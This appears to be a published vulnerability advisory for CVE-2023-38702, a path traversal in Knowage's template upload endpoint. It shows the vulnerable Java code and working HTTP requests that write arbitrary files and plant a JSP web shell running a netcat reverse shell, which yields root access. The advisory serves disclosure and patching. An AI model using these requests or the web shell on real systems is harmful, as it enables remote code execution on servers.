Headline

CVE-2023-38702: Path traversal in upload functionalities

Knowage is an open source analytics and business intelligence suite. Starting in the 6.x.x branch and prior to version 8.1.8, the endpoint /knowage/restful-services/dossier/importTemplateFile allows authenticated users to upload template file on the server, but does not need any authorization to be reached. When the JSP file is uploaded, the attacker just needs to connect to /knowageqbeengine/foo.jsp to gain code execution on the server. By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the knowageqbeengine directory and gain code execution capability on the server. This issue has been patched in Knowage version 8.1.8.

1 year ago

CVE

Open in Source

#vulnerability #web #apache #js #java #intel #perl #auth

Package

KnowageLabs / Knowage-Server (Knowage)

Affected versions

6.x.x, 7.x.x, 8.0.x, < 8.1.8

The /knowage/restful-services/dossier/importTemplateFile endpoint allows authenticated users to upload "templates" on the server, but does not need any authorization to be reached.

Also, this endpoint does not check the type of the file that is uploaded by the user, and does not properly handle the filename provided. In fact, the filename is directly appended to the location of where the file will be written, allowing an attacker to perform a path traversal attack and place his file anywhere on the file system.

// knowage-core/src/main/java/it/eng/spagobi/api/DossierActivityResource.java public Response importTemplateFile(MultiPartBody multipartFormDataInput) throws JSONException { byte[] archiveBytes = null; JSONObject response = new JSONObject(); try { String separator = File.separator; final FormFile file = multipartFormDataInput.getFormFileParameterValues(“file”)[0]; String fileName = file.getFileName(); archiveBytes = file.getContent(); // […] File f = new File(SpagoBIUtilities.getResourcePath() + separator + “dossier” + separator + fileName); FileOutputStream outputStream = new FileOutputStream(f); outputStream.write(archiveBytes); outputStream.close();

By performing the following HTTP request against the application, a file called poc will be written into the /tmp directory of the underlying server.

POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
Host: 127.0.0.1:8088
Cookie: JSESSIONID=C21D8A4676D617862E020548CC3C7518; kn.lang=en-US
Content-Length: 211
Content-Type: multipart/form-data; boundary=d7fe18eaf5c6958f3e8723a6ca89c392

--d7fe18eaf5c6958f3e8723a6ca89c392
Content-Disposition: form-data; name="file"; filename="../../../../../../../../tmp/poc"
Content-Type: image/png

synacktiv was here.
--d7fe18eaf5c6958f3e8723a6ca89c392--

HTTP/1.1 200 
Date: Mon, 27 Jun 2022 17:56:34 GMT
[...]

{"STATUS":"OK"}


root@1f7ab7904524: /# cat /tmp/poc
synacktiv was here.

Impact

By exploiting this vulnerability, an attacker with low privileges can upload a JSP file to the knowageqbeengine directory and gain code execution capability on the server.

POST /knowage/restful-services/dossier/importTemplateFile HTTP/1.1
[...]

--d7fe18eaf5c6958f3e8723a6ca89c392
Content-Disposition: form-data; name="file"; filename="../../../../../../../../home/knowage/apache-tomcat/webapps/knowageqbeengine/foo.jsp"
Content-Type: image/png

<%@ page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%Runtime.getRuntime().exec("nc -c sh 127.0.0.1 1337");%>

--d7fe18eaf5c6958f3e8723a6ca89c392--

HTTP/1.1 200 
[...]

{"STATUS":"OK"}

When the JSP file is uploaded, the attacker just needs to connect to /knowageqbeengine/foo.jsp to gain code execution on the server.

$ curl http://127.0.0.1:8088/knowageqbeengine/foo.jsp
[...]
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 56678
id
uid=0(root) gid=0(root) groups=0(root)

Patches

You need to upgrade to Knowage 8.1.8 or a later version.